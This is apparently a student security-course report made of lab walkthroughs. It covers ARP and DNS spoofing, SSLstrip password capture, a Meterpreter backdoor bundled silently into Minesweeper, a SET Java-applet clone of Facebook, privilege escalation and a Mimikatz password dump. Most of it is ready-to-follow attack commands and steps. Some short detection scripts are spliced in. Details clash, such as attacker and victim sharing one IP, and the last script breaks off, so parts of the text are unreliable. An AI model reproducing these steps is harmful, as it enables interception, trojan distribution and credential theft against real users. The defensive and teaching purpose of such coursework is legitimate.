Network Exploits And Vulnerabilities Final Project FSCT 8590


Introduction

Every day, a computer is vulnerable to exploitation by hackers who know how to use malicious 0-day exploits with just a click of a button and a few scripts of their own. They range from the apprentice (script-kiddie) to the journeyman, to the master hacker. We must be careful and gain the in-depth knowledge to know our offenses and defenses. We as network security professionals must together collect and master a gamut of skills to know our attackers better before they wage cyberwar. Sun Tzu once said, “Rouse him, and learn the principle of his activity or inactivity. Force him to reveal himself, so as to find his vulnerable spots.” To understand a hacker’s mind, we too must conduct detailed analysis of exploits and malicious software. Today’s networks face attacks such as the ones described in this report because people are unaware that they are being socially engineered, or are not installing security updates, or are not even updating their virus definitions to the latest. As a matter of fact, some people are insecure to the point that they do not use virus scanners at all.

Throughout this report, I will be using Kali Linux 1.1.0a, the Metasploit toolkit combined with the Armitage GUI, and Ettercap for spoofing and MITM (man-in-the-middle) attacks. I will be using Wireshark for the packet dumps, and the Social Engineering Toolkit (SET) to demonstrate my hacks. I will document these examples precisely so that you will have a better glimpse of what hacking and exploiting a victim machine from an attacker machine looks like.



Three Scenarios

First Scenario: Spoofing and Man-In-The-Middle (MITM) attacks

Our first scenario requires us to understand, perform, and analyze Active Sniffing of a Switched LAN.

Primary Objective: 

Using Ettercap to carry out the following exploits:

The ARP Spoofing and Man-In-The-Middle attack

DNS Spoofing Attack

SSLstripping using Ettercap to carry out a password stealing attack.

Second Scenario: Post Exploitation with Armitage and Meterpreter 

Our second scenario requires us to generate payloads using Metasploit, applying the Reverse TCP and Reverse HTTP payloads to exploit the victim over TCP and HTTP respectively.

Primary Objective: 

Combine the Meterpreter payload with a legitimate program (using a basic binder) to run an exploit on the victim’s machine. Then use that compromised machine for post-exploitation actions such as dumping hashes, live sessions, screenshots, camera activation, etc.

Third Scenario: The Social Engineering Toolkit (SET) 

Using SET to illustrate that indeed the weakest link in the network is the human element.

Primary Objective: 

To use SET to select the following “Web Site Attack Vectors” and to utilize the Java Applet vulnerability.

To carry out two exploitation methods:

1. Web Template method

2. Site Cloner method



First Scenario: Spoofing And Man-In-The-Middle Attacks

Before we head into how the attacks work, we first need to define a couple of terms.

ARP Spoofing: An ARP (Address Resolution Protocol) spoofing attack is a man-in-the-middle attack in which a malicious actor repeatedly sends falsified ARP messages over a LAN. The result of the attack is that the attacker’s MAC address becomes linked with the IP address of a legitimate computer or server on the exploited network. Once the ARP spoof is in place, the attacker can intercept, modify, or even stop data in transit.

ARP Man-In-The-Middle Attack: The man-in-the-middle attack inserts the attacker’s machine between two communicating machines, so that it acts as a middleman. That way, the attacker can intercept routing information and listen to all communications that pass through in the process.

DNS Spoofing Attack: The DNS spoofing attack replaces legitimate DNS entries with malicious ones so that the traffic is redirected somewhere else, where the attacker wants it.

SSL Strip Attack: A dangerous attack that strips HTTPS from pages and gives the end user an HTTP page (with no security, no encryption), while the traffic is redirected through another port.



The following is an illustration of ARP spoofing.

Diagram of ARP Spoofing And Man-In-The-Middle:

Router’s IP: 192.168.1.254
Victim’s IP: 192.168.1.67
Attacker’s IP: 192.168.1.67

Attacker uses ettercap to spoof the victim’s IP 192.168.1.71 on the eth0 network.

Demonstration of ARP Spoofing And Man-In-The-Middle Attacks Through Driftnet and Urlsnarf:

1. We will be using IP forwarding for this (the ip_forward kernel setting), so type the following:

echo 1 >> /proc/sys/net/ipv4/ip_forward

By default, forwarding is not enabled in Kali Linux. We want our computer to act like a router: it takes the packets that come in and forwards them on to their destination.



2. For this experiment, we will demonstrate the ARP spoofing technique, where we use Ettercap to pretend to be the router (the man-in-the-middle) and, as a result, capture the packets sniffed throughout the network. Also, by using a program called driftnet, we can capture unencrypted images viewed on the network during the MITM (man-in-the-middle) attack.

3. We will start off by running:

ettercap -M arp /192.168.1.254/ /192.168.1.71/ -p -T -q -i eth0

Here 192.168.1.254 is the router IP, 192.168.1.71 is the victim IP and eth0 is the network interface. When executed, this command ARP-poisons the victim so that the router’s IP is associated with your MAC address, placing you in the middle. From there you can act as the router and sniff packets or images from 192.168.1.71, the victim IP address, for example. When the spoof is in place, the output below will show up.

4. Next, open a new tab; we are going to perform the man-in-the-middle image capture using the program driftnet. You can sniff by typing:

driftnet -i eth0



5. So, as you can see here, we have performed an ARP spoofing attack and used the driftnet software to capture images from the sniffed traffic.

6. Next, to analyze the network at a deeper level, we can use the program urlsnarf to intercept the URLs of websites visited after ARP spoofing/poisoning.

7. The command we must type in order to sniff the URLs passing between the victim and the router (through our machine) is:

urlsnarf -i eth0



Wireshark Analysis:

The following is a Wireshark analysis of the ARP spoofing captured in the process. Note that Wireshark detects a duplicate use of 192.168.1.71, which indicates an ARP spoof and MITM attack!
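As an added example (not part of the original report), the following Python script reproduces the duplicate-IP check that Wireshark performs, applied to a constructed stream of ARP replies using the lab’s router and victim addresses; the MAC addresses and the optional IP-to-MAC inventory are assumptions made for the demo.

```python
"""Detect ARP cache poisoning from observed ARP replies.

Added example, not part of the original report. It codifies the check that
Wireshark makes when it reports a duplicate use of an IP address: two different
MAC addresses claiming the same IP on one segment. The replies below are
constructed for the demo; the IPs follow the report's lab (router
192.168.1.254, victim 192.168.1.71) and every MAC is made up.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass(frozen=True)
class ArpReply:
    """The fields of an ARP reply that matter for poisoning detection."""
    sender_ip: str
    sender_mac: str
    target_ip: str


class ArpMonitor:
    """Track which MAC addresses have claimed each IP on the segment."""

    def __init__(self, inventory: Optional[Dict[str, str]] = None) -> None:
        # Documented IP -> MAC mapping for the segment, if the site keeps one.
        # Without it the monitor can only say that a conflict exists, not
        # which of the two claimants is the impostor.
        self.inventory = {ip: mac.lower() for ip, mac in (inventory or {}).items()}
        self.claims: Dict[str, Set[str]] = defaultdict(set)
        self.alerts: List[str] = []

    def observe(self, pkt: ArpReply) -> None:
        ip, mac = pkt.sender_ip, pkt.sender_mac.lower()
        if mac in self.claims[ip]:
            return  # ettercap repeats its replies; report each pairing once
        if self.claims[ip]:
            known = ", ".join(sorted(self.claims[ip]))
            self.alerts.append(f"duplicate use of {ip}: {mac} vs {known}")
        if ip in self.inventory and self.inventory[ip] != mac:
            self.alerts.append(
                f"{ip} claimed by {mac}; inventory says {self.inventory[ip]}")
        self.claims[ip].add(mac)

    def poisoned_ips(self) -> Set[str]:
        """IPs that more than one MAC has claimed."""
        return {ip for ip, macs in self.claims.items() if len(macs) > 1}


def analyse(packets: Iterable[ArpReply],
            inventory: Optional[Dict[str, str]] = None) -> ArpMonitor:
    """Run every reply through a fresh monitor and return it."""
    mon = ArpMonitor(inventory)
    for pkt in packets:
        mon.observe(pkt)
    return mon


# Constructed lab inventory: the MACs are invented, locally administered addresses.
ROUTER_IP, VICTIM_IP = "192.168.1.254", "192.168.1.71"
LAB_INVENTORY = {ROUTER_IP: "02:00:00:00:00:01", VICTIM_IP: "02:00:00:00:00:02"}
ATTACKER_MAC = "02:00:00:00:00:aa"

# Constructed capture: two genuine replies, then the poisoning replies that a
# bidirectional ARP MITM sends to each side, one of them repeated.
SAMPLE_REPLIES = [
    ArpReply(ROUTER_IP, "02:00:00:00:00:01", VICTIM_IP),
    ArpReply(VICTIM_IP, "02:00:00:00:00:02", ROUTER_IP),
    ArpReply(ROUTER_IP, ATTACKER_MAC, VICTIM_IP),
    ArpReply(VICTIM_IP, ATTACKER_MAC, ROUTER_IP),
    ArpReply(ROUTER_IP, ATTACKER_MAC, VICTIM_IP),
]

if __name__ == "__main__":
    for line in analyse(SAMPLE_REPLIES, LAB_INVENTORY).alerts:
        print("ALERT:", line)
```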

Diagram of DNS Spoofing Attack (www.facebook.com vs. www.fakebook.com):

1. Legitimate DNS request destined for the DNS server.

2. False DNS response provided to the victim by the attacker.

3. As a result, the victim begins communicating with www.fakebook.com, a malicious site.

Demonstration of DNS Spoofing Attack On A LAN:

The following example will be a DNS spoofing attack on the LAN. Like the previous example, first we need to set up forwarding:

1. echo 1 > /proc/sys/net/ipv4/ip_forward

For this scenario, my IP will be 192.168.1.71. The target for this scenario will be all DNS requests that pass through the router, 192.168.1.254. Now, let’s edit etter.dns at /etc/ettercap/etter.dns by typing:

2. leafpad /etc/ettercap/etter.dns



3. Here is the content of etter.dns to make it work. google.com will be redirected to 206.190.36.45, which is www.yahoo.com’s IP address, and facebook.com will be redirected to 108.174.10.10, which is www.linkedin.com.

google.com A 206.190.36.45
*.google.com A 206.190.36.45
www.google.com PTR 206.190.36.45
facebook.com A 108.174.10.10
*.facebook.com A 108.174.10.10
www.facebook.com PTR 108.174.10.10

Having these settings, you can start to spoof DNS on Kali Linux using the command-line format:

4. ettercap -T -q -i <interface> -P <plugin> -M arp // //

In our case, we will type:

ettercap -T -q -i eth0 -P dns_spoof -M arp // //


Wireshark Analysis:

As you can see in this Wireshark capture, accounts.google.com was redirected to 206.190.36.45, which is yahoo.com (but it could equally be replaced with any malicious site by the attacker). This is an example of DNS spoofing across the wire.
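As an added example (not part of the original report), the following Python script shows how the spoof in this capture would be detected on the wire: the forged answer and the real resolver’s answer both arrive for the same transaction ID with different A records. The responses are constructed; the genuine addresses are placeholders from the RFC 5737 documentation range, and the router is assumed to be the LAN’s resolver, as in this scenario.

```python
"""Detect DNS spoofing on a LAN from the responses seen on the wire.

Added example, not part of the original report. An on-path spoofer such as
ettercap's dns_spoof plugin answers the victim's query before the real resolver
does, and forges the source address so the packet appears to come from the
resolver. The real answer still arrives a moment later, so the reliable signal
is two responses to one transaction ID carrying different A records.
The responses below are constructed: 203.0.113.0/24 (RFC 5737) stands in for
the genuine addresses, and the forged answers reuse the IPs from etter.dns.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set, Tuple


@dataclass(frozen=True)
class DnsResponse:
    txid: int      # DNS transaction ID copied from the query
    qname: str     # name that was queried
    answer: str    # A record in the response
    src_ip: str    # source IP of the response packet
    t: float       # capture timestamp in seconds


def find_dns_conflicts(responses: Iterable[DnsResponse], resolver_ip: str,
                       window: float = 2.0) -> List[str]:
    """Alert on conflicting answers to one query and on unexpected sources."""
    seen: Dict[Tuple[int, str], List[DnsResponse]] = defaultdict(list)
    alerts: List[str] = []
    for r in sorted(responses, key=lambda x: x.t):
        # A response from anything but the configured resolver is wrong on its
        # own, though a spoofer that forges the source will not trip this check.
        if r.src_ip != resolver_ip:
            alerts.append(f"{r.qname}: answer {r.answer} from unexpected source {r.src_ip}")
        key = (r.txid, r.qname.lower())
        for prev in seen[key]:
            if prev.answer != r.answer and r.t - prev.t <= window:
                alerts.append(
                    f"{r.qname} txid {r.txid:#06x}: {prev.answer} then {r.answer} "
                    f"{r.t - prev.t:.3f}s later; the client kept the first")
        seen[key].append(r)
    return alerts


def spoofed_names(responses: Iterable[DnsResponse]) -> Set[str]:
    """Names for which one transaction ID received more than one distinct answer."""
    answers: Dict[Tuple[int, str], Set[str]] = defaultdict(set)
    for r in responses:
        answers[(r.txid, r.qname.lower())].add(r.answer)
    return {qname for (_, qname), a in answers.items() if len(a) > 1}


RESOLVER_IP = "192.168.1.254"   # the report's router, assumed to resolve DNS for the LAN

# Constructed capture: forged answers land first, genuine ones a few ms later.
SAMPLE_RESPONSES = [
    DnsResponse(0x1a2b, "accounts.google.com", "206.190.36.45", RESOLVER_IP, 0.010),  # forged
    DnsResponse(0x1a2b, "accounts.google.com", "203.0.113.10", RESOLVER_IP, 0.045),   # genuine
    DnsResponse(0x77c1, "www.facebook.com", "108.174.10.10", RESOLVER_IP, 1.200),     # forged
    DnsResponse(0x77c1, "www.facebook.com", "203.0.113.20", RESOLVER_IP, 1.230),      # genuine
    DnsResponse(0x3e00, "www.yahoo.com", "206.190.36.45", RESOLVER_IP, 2.000),        # single answer
]

if __name__ == "__main__":
    for line in find_dns_conflicts(SAMPLE_RESPONSES, RESOLVER_IP):
        print("ALERT:", line)
```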

Diagram of SSLStrip Plugin in Ettercap and Password Stealing Attack: the browser sends GET http://my.bcit.ca to the SSL Strip proxy, which sends GET https://my.bcit.ca to the web server and relays the HTML response back over plain HTTP. The browser loads http://my.bcit.ca instead of https://my.bcit.ca because the page has been SSL stripped and modified.

Demonstration of Password Stealing Attack using SSLStrip Plugin in Ettercap:

The following is a demonstration of enabling the sslstrip plugin in Ettercap and carrying out a password stealing attack.

1. First, it is necessary to set up forwarding if you haven’t. In the terminal, run:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Next, run:

cat /proc/sys/net/ipv4/ip_forward

To make sure that it works, you should have 1 as the output.

3. We will now set iptables to redirect everything that comes in on port 80 to port 8080. Our main objective here is to do exactly what the name sslstrip means: strip HTTPS from pages and give the end user an HTTP page (with no security, no encryption). So, the port we’ll redirect the stripped content to will be port 8080.



4. To do the port redirection, we configure iptables with this command:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

5. To confirm that the port redirection is in place, we then run:

iptables -t nat -L

To make sure that you are on the right track, you should see: tcp dpt:http redir ports 8080

6. We now want to spoof ARP on the victim IP to trick it into thinking that we are sending packets from the router’s IP address. The command format is:

arpspoof -i <interface name> -t <target IP address> -r <router IP>

As a complete command, I will type the following:

arpspoof -i wlan0 -t 192.168.1.71 -r 192.168.1.254



7. Now, open another tab or another terminal and type the following (the -a option logs all SSL and HTTP traffic to and from the server):

sslstrip -l 8080 -a

Now the SSL stripping is running.

8. On the victim machine, we will attempt to log in to my.bcit.ca through the stripped connection. Notice that on the BCIT page, the https protocol is removed because we used sslstrip.

9. By default, the sslstrip.log file is stored in the /root folder in Linux. Now, open it with leafpad sslstrip.log to view the stripped traffic being logged.


10. If we do a keyword search on the .log file in leafpad for the username A00799452, we will find the password beside it, which is censored here for security reasons.

Wireshark Analysis:

Just by looking at this TCP stream, we can identify that the HTTP connections are not encrypted, and that sslstrip has stripped away the HTTPS layer on top of them.
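As an added example (not part of the original report), the following Python script flags what that TCP stream shows: a login form posted over plain HTTP to a host that normally serves it over HTTPS. The requests are constructed; the host and username come from the demonstration, and the password is a placeholder.

```python
"""Flag credentials submitted over plaintext HTTP, the symptom sslstrip leaves.

Added example, not part of the original report. After an SSL-stripping MITM,
the victim's browser posts its login form to http:// instead of https://, so a
monitor on the segment (or a proxy log) sees the form fields in the clear.
The requests below are constructed; the host and username are the ones the
report mentions and the password value is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List
from urllib.parse import parse_qsl

# Form field names that usually carry a secret.
SECRET_FIELD = re.compile(r"pass(word|wd)?$|pwd|secret|token|pin$", re.I)


@dataclass(frozen=True)
class HttpRequest:
    method: str
    host: str
    port: int
    path: str
    body: str = ""   # urlencoded form body, empty for GET


def mask(value: str) -> str:
    """Keep only the length of a secret so the alert itself does not leak it."""
    return "*" * len(value)


def credentials_in_clear(requests: Iterable[HttpRequest],
                         https_only: Iterable[str] = ()) -> List[str]:
    """Alerts for POSTs on port 80 whose form fields look like credentials.

    https_only lists hosts known to serve their login over TLS; a plaintext
    POST to one of them is the direct signature of a stripped session.
    """
    tls_hosts = {h.lower() for h in https_only}
    alerts: List[str] = []
    for r in requests:
        if r.port != 80 or r.method.upper() != "POST" or not r.body:
            continue
        fields = parse_qsl(r.body, keep_blank_values=True)
        secrets = [(k, v) for k, v in fields if SECRET_FIELD.search(k)]
        if not secrets:
            continue
        shown = ", ".join(f"{k}={mask(v)}" for k, v in secrets)
        note = " (host normally HTTPS: stripped session)" if r.host.lower() in tls_hosts else ""
        alerts.append(f"cleartext credentials to http://{r.host}{r.path}: {shown}{note}")
    return alerts


HTTPS_ONLY_HOSTS = {"my.bcit.ca"}   # the portal used in the report's demonstration

# Constructed traffic as a monitor would see it after the ARP MITM plus sslstrip.
# The last entry is what a TLS-terminating proxy log would record; on the wire
# it is encrypted, and port 443 is skipped either way.
SAMPLE_REQUESTS = [
    HttpRequest("GET", "my.bcit.ca", 80, "/"),
    HttpRequest("POST", "my.bcit.ca", 80, "/login",
                "username=A00799452&password=placeholder-not-real"),
    HttpRequest("POST", "www.example.com", 80, "/search", "q=ettercap"),
    HttpRequest("POST", "shop.example.com", 443, "/login", "user=alice&password=x"),
]

if __name__ == "__main__":
    for line in credentials_in_clear(SAMPLE_REQUESTS, HTTPS_ONLY_HOSTS):
        print("ALERT:", line)
```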



Second Scenario: Post Exploitation With Armitage and Metasploit

Definitions:

Armitage: Armitage is an exploitation tool built on top of the Metasploit framework. It is a GUI designed as an attack management tool that visualizes targets and recommends exploits.

Reverse TCP: This is an Armitage / Metasploit payload that is planted on the vulnerable person’s computer. Once the victim runs it, it opens a TCP connection back to the attacker’s listener and stealthily delivers its payload on the system.

Reverse HTTP: This is another Armitage / Metasploit payload, for use once it has been loaded onto a vulnerable person’s computer. It connects back to the attacker over HTTP (usually port 80, or any given port). When a victim goes to the web page and also clicks on the program, that person is open to exploitation.

Binder: This is software that binds two different .exe files together. IExpress.exe is an example of such software. When run in administrator mode, it can combine two .exe files into one. This program is usually used to bind exploits and innocent-looking programs together, so that the exploit is in fact packed inside.



Metasploit Exploitation Diagram: the attacker sends reverse TCP and reverse HTTP payloads to the victim; the bound Meterpreter runs on the victim’s machine and connects back.

Demonstration Of Armitage Used For Exploiting The Following Vulnerability: Reverse TCP

The main program we are going to use is Armitage, for exploiting the following vulnerabilities: Reverse TCP and Reverse HTTP. We are also going to use a binder to bind the exploit with a normal application program, so that receiving the program (exploit) looks more legitimate to the end user.

*NOTE: In order for the Armitage exploit to work on the victim’s computer, we must disable antivirus on the victim’s machine. Please disable any antivirus programs such as AVG, Avast, Windows Defender or Microsoft Security Essentials before starting.

Reverse TCP:

1. To begin the process, we will start the postgresql and metasploit services running in the background by typing:

service postgresql start
service metasploit start



2. Now, go into Armitage via the Kali Linux Applications menu > Kali Linux > Exploitation Tools > Network Exploitation > Armitage. If asked for a username and password, you can use the default settings.

3. Once you are in Armitage, go to the Hosts menu > Nmap Scan > Intense Scan. As the scan range, you can enter the target IP address, which is 192.168.1.71 (or whatever the IP is).

4. Once the nmap scan is completed, it should detect that the machine is indeed a Windows machine.



Preparing The Exploit And Binder:

1. Under the search bar in Armitage, type in meterpreter.

2. Find the Windows exploit version for reverse_tcp.

3. Next, double-click on it, or drag it onto the Windows computer.

4. Note down the port number, which is 6687 in this case (it could really be any listening port).



5. You want to make sure you save the exploit as backdoor1.exe, since that is the backdoor we use for entry into the machine. Now, we can pack the exploit in Windows. We will use IExpress for this task. Note, if you are using Windows 8, open the IExpress application from the Windows 8 sidebar, and make sure you run it in Run As Administrator mode.

Binding The Exploit (backdoor1.exe) into Minesweeper.exe

To download Minesweeper.exe, you must go here: http://www.minesweeper.info/downloads/MinesweeperX.html

For the next few steps, we will bind the exploit onto Minesweeper.exe.



1. First, click on Create new Self Extraction Directive file. Click on Next.

2. Then, click on Extract files and run an installation command. Click on Next.



3. When you are ready to start, name your package title Super Minesweeper.exe. Then, click on Next.

4. Click on No prompt. Then, click on Next.



5. Click on Do not display a license. Then click on Next.

6. Add the two files that you want to combine, which are backdoor1.exe and Minesweeper.exe.



7. For the Install Program, select Minesweeper.exe, since this is the program that you want to install. And, for the Post Install Command, select the bound program, which is backdoor1.exe.

8. Select Hidden in this option and click on Next.



9. Click on No Message. Then, click on Next.

10. At this point, name your file Super Minesweeper.exe. Then, check Hide File Extracting Program Animation from User. Click on Next.



11. Click on No restart. Then, click on Next.

12. Click on Don’t save. Then, click on Next.



13. Once you are ready to create the package, click on Next

14. Click on Finish to finalize. Once SuperMinesweeper.exe is bound, it can be run from the victim’s machine, which makes a reverse_tcp connection to the attacker’s machine, like a client and server. This exploit (malware backdoor) can be downloaded from any malicious site that hosts the malware, and can be used for targeting people who download suspicious software from the Internet.



Creating A Listener And Listening On The Port:

To create a listener, please follow these steps. A listener is necessary to receive the remote connection from the victim’s PC. In Armitage:

1. Click on the Armitage menu > Listeners > Reverse (wait for)

2. Then, enter the port number that you earlier received from LPORT.

Executing The Backdoor: If you are ready to launch the backdoor, just double-click on Super Minesweeper.



Observing And Exploiting From Meterpreter:

This is what it looks like once we have established a meterpreter session in Armitage. To open a command shell and establish a live session:

1. Right-click on the vulnerable machine.

2. Left-click on meterpreter #.

3. Then, click on Interact.

4. Then, click on Command Shell.



Browsing Files In A Live Session: To browse files on the system, you need to:

1. Right-click on the vulnerable machine.
2. Left-click on the established meterpreter #.
3. Then, click on Explore.
4. Click on Browse Files.

Taking A Screenshot With Meterpreter:

1. Right-click on the vulnerable machine.
2. Left-click on the established meterpreter #.
3. Click on Explore.
4. Click on Screenshot.



Taking A Webcam Shot With Meterpreter (Camera Activation):

1. Right-click on the vulnerable machine.
2. Left-click on the established meterpreter #.
3. Click on Explore.
4. Click on Webcam Shot.

Other things you can do when you have full privileges, not shown in this example because of restriction issues:

Dumping (registry) Hashes:

1. Right-click on the vulnerable machine.
2. Left-click on the established meterpreter #.
3. Then, click on Access.
4. Click on Dump Hashes.





Wireshark Analysis:

As you can see from this Wireshark capture, the exploit is running through the TCP packets. If we follow the TCP stream, we can see the exploit code of backdoor1.exe or Super Minesweeper.exe as unreadable characters.

Demonstration Of Armitage Used For Exploiting The Following Vulnerability: Reverse HTTP

In this demonstration, we will make the user click on an exploit on a web page, and then, from there, make them click on an infected backdoor which will allow a meterpreter session on their computer. This is how the target machine is made vulnerable.



1. In order to successfully attack this machine, we first double-click reverse_http.

2. Next, you must specify the LPORT (listening port) to be port 80, which is mainly what the Apache HTTP server uses.



4. Now, we want to make a new .exe backdoor, save it, and then combine it with Super Minesweeper.exe.

5. To bind it with Super Minesweeper.exe, follow the instructions above.

6. Click on Super Minesweeper.exe when you are ready.

7. If you go back to the attacker’s machine, which is 192.168.1.77, you should see a vulnerable (exploited) machine with Meterpreter on it.



Now, you can complete the same activities that were done with Reverse TCP. You can carry out activities such as dumping hashes, live sessions, screenshots, camera activation, etc.

Wireshark Analysis:

When viewed in Wireshark, this exploit uses the HTTP protocol and, through that, pushes in a backdoor transmission over TCP for the file transfer. This .pcap shows the victim IP, 192.168.1.72, connecting to 192.168.1.77, the attacker’s IP.



Third Scenario: The Social Engineering Toolkit (SET)

Definitions:

Social engineering: Social engineering is a hacking technique where hackers exploit the weakness of the human element, the mind. It relies entirely on human interaction and often involves tricking people into breaking normal security practices.

Social Engineering Toolkit (SET): The Social Engineering Toolkit mimics websites and masquerades as the real thing; if any victim clicks on its web-generated content, such as to download a fake Java applet, they are exploited by a payload such as reverse_tcp.

Java Applet Vulnerability: This is a social engineering exploit in which the user clicks on a falsely generated Java applet prompt, which states that you need to update your Java. If clicked and executed, it acts as a backdoor in the background. Moreover, it carries a dangerous payload that can start a meterpreter shell in the background if launched.

Mimikatz: This is a password program that is uploaded to and run on the victim’s machine in the post-exploitation phase. When run, it can pull up and dump the main passwords and hashes of the local users of that Windows system.



The following is an illustration of the Social Engineering Toolkit.

Social Engineering Toolkit Diagram:

Demonstration Of Social Engineering Toolkit Using Web Template Technique:

Pre-exploitation Phase: We need to run these commands in the terminal for the pre-exploitation phase.

1. apt-get update

2. apt-get install metasploit

3. apt-get install set

4. gem install rake

Exploitation Phase: Web Template Method:

1. First, start up Social Engineering Toolkit 6.3 by going to the terminal and typing setoolkit. You should then get this screen.



2. Choose Option 1.

3. Next, choose Option 2, which is Website Attack Vectors.



4. Choose Option 1, for Java Applet Attack Method.

5. Next, choose Option 1 again, for Web Templates.

6. Next, when asked whether you are using NAT/Port Forwarding, answer yes.

7. Then, type in the IP address for the SET web server, which can be your SET server. In my example, I entered 192.168.1.77 (this may differ), the IP address of my Kali Linux machine.



8. When asked whether the payload handler [metasploit] is on a different IP from your external NAT/Port FWD address, answer no.

9. On the next option, go for option 2, which states that you want to use the applet built into SET.

10. Select Java Required, the first option for the template.

11. Then, when asked for the payload, type in 1 for Meterpreter Memory Injection.



12. Then, choose option 1 again, which is Windows Meterpreter Reverse TCP.

13. Once you have the payload listening on the attacker side, you can proceed to the next step.



14. Open a Firefox browser to test your payload. You should get something like this. If your Java software has blocked this from happening, you need to unblock the attacker’s IP address.

15. Once you have a meterpreter session established, type in sessions.

16. The attacker now has full access to the target machine. At this point, we can establish an interactive session with the target machine using the “sessions -i” command, and issue commands to browse through the compromised system, upload and download files, get a remote command shell, etc.

17. Now, run sessions -i 1 to get access to the compromised machine in session 1.



18. Next, open a shell by typing shell within meterpreter.

Obtaining Passwords from Mimikatz:

For the next experiment I will obtain the current Windows passwords (in plain text) for all of the accounts on the target system.

1. First, establish a shell for mimikatz by typing shell in the meterpreter. Go to your chosen directory and run mkdir mimikatz in the folder where you want to place it.

2. Next, type exit in the shell to go back to the meterpreter session.



3. In your meterpreter session, run cd c:\\Users\\Nathan to go into the victim’s user folder on the victim machine.

4. Now, upload all the files in the mimikatz folder to your victim’s machine by typing in something like this:

upload /root/mimikatz_trunk/x64 c:\\Users\\Nathan\\mimikatz

Next, we will run the mimikatz program.

5. If you are attacking (exploiting) a Windows 8.1 machine, you need to follow these steps in order to get SYSTEM privileges so that you can use mimikatz. First, create a local Windows account such as NatheAdmin. Note that Microsoft accounts will not work, because they are synced via a Windows Live account instead of the local UAC or SYSTEM.



6. First, in your meterpreter session, run background. Then, use exploit/windows/local/ask. We use the ask exploit because it is designed to escalate privileges in Windows 8.

7. Next, run sessions -l

8. Then, run set session 3

9. Type in show options.

10. Run set lport 554.

11. Then, type in exploit.

12. If you have already created that local user account in Windows, you can then type getsystem.

13. Next, run getuid. This will allow you to check which administrative role you have on the hacked computer. You now have NT AUTHORITY\SYSTEM, meaning you have full rights to the system.


14. Type shell within the meterpreter console. Then, run dir. If you are in the right directory, you should be able to run mimikatz, which opens a mimikatz terminal within the victim’s machine.

15. If you are unable to reach the mimikatz directory, go into it and verify that you are in the right directory to run mimikatz.

16. Now, if you are ready to start the exploitation process, type in mimikatz.



17. Now, run the command sekurlsa::logonPasswords full to get a dump of the passwords recovered from the LSA (Local Security Authority) of Windows.

Demonstration Of Social Engineering Toolkit Using Site Cloner Technique:

1. If you haven’t already, execute the Social Engineering Toolkit by going to the terminal and typing setoolkit. Choose option 1.



2. Select option 2 for Website Attack Vectors.

3. Select Option 1, which is the Java Applet Attack Method.



4. Then, select option 2, which is Site Cloner.

5. When asked if you want to do NAT/Port Forwarding, answer yes.

6. When asked for the IP address of the SET web server, type in 192.168.1.77.

7. When asked if your payload handler is on a different IP from your external NAT/Port FWD address, answer no.

8. Choose option 2 to use the applet built into SET.

9. For the URL we want to clone, enter an address such as http://www.facebook.com



10. For the payload to generate, select option 1.

11. Leave the PORT of the listener at the default of 443 by pressing ENTER.

12. For the payload number, enter 1, the typical Windows Meterpreter Reverse TCP payload.

13. Once you load the exploit using the Social Engineering Toolkit, you should get something like this.



14. Now, go to your victimized IP address, which is 192.168.1.67, and accept the Java applet. Check the box “I accept the risk and want to run this application”. Then, click on Run.

15. If you go back to your terminal, a meterpreter session should be established. You can then run sessions -l to see which meterpreter sessions are open. Then, repeat the above steps for the mimikatz exploit and password dump.

Wireshark Analysis:

Throughout these two exploits of the Social Engineering Toolkit, we can examine the exploit carrying out two methods: the Web Template and the Site Cloner. They both use the Reverse TCP payload, which makes a reverse connection over TCP to exploit the target. When we do a Follow TCP Stream, we can see that indeed there is exploit code travelling along the TCP stream. This is what exploits the victim machine, if we examine this network forensically.



Defense Measures Against Exploits:

ARP Spoofing And Man-In-The-Middle Attacks: Preparation

The SANS Institute states that the best method of defending against ARP spoofing attacks is to know thy system extremely well. If your network is static or changes rarely, then good network design and documentation are an effective measure. SANS also notes that most IDS systems do little to monitor or alert on suspicious ARP activity.

Host Hardening 

SANS states that ARP tables can be statically mapped using the arp -s command. It warns that static mappings should be tested on your OS for durability during ARP attacks. The network administrator or security analyst should always inventory their network hosts' operating systems for their response to ARP attacks, so that they know what the network is vulnerable to.
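Static mappings only help if you also notice when the dynamic cache disagrees with them. As an added example (mine, not from the report or from SANS), the Python below parses a Linux /proc/net/arp table, reports any MAC address claimed by more than one IP (the classic poisoning signature), compares pinned hosts against a baseline, and emits the arp -s lines that would pin that baseline. The table is constructed; 192.168.1.1 is assumed to be the gateway, 192.168.1.77 is the Kali host from the report, and all MAC addresses are invented.

```python
# Constructed sample of a Linux /proc/net/arp table (not captured from the
# report's lab). The gateway 192.168.1.1 is an assumption; 192.168.1.77 is the
# Kali host in the report. Here the gateway's entry has been overwritten with
# the Kali host's MAC, so two IPs now resolve to one hardware address.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
192.168.1.67     0x1         0x2         00:0c:29:11:22:33     *        eth0
192.168.1.77     0x1         0x2         00:0c:29:aa:bb:cc     *        eth0
"""

# Known-good mapping the administrator recorded while the network was clean
# (invented value for this example).
BASELINE = {"192.168.1.1": "00:0c:29:de:ad:01"}


def parse_arp_table(text):
    """Parse /proc/net/arp text into {ip: mac}, skipping the header line."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) >= 4:
            entries[fields[0]] = fields[3].lower()
    return entries


def shared_macs(entries):
    """Return {mac: [ips]} for every MAC claimed by more than one IP address."""
    by_mac = {}
    for ip, mac in entries.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def baseline_violations(entries, baseline):
    """Return [(ip, expected_mac, seen_mac)] for pinned hosts whose MAC changed."""
    return [(ip, mac, entries[ip]) for ip, mac in baseline.items()
            if ip in entries and entries[ip] != mac.lower()]


def static_arp_commands(baseline):
    """Render the arp -s commands that pin the baseline, as the text suggests."""
    return [f"arp -s {ip} {mac}" for ip, mac in baseline.items()]


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_TABLE)
    for mac, ips in shared_macs(table).items():
        print(f"MAC {mac} claimed by {', '.join(ips)}")
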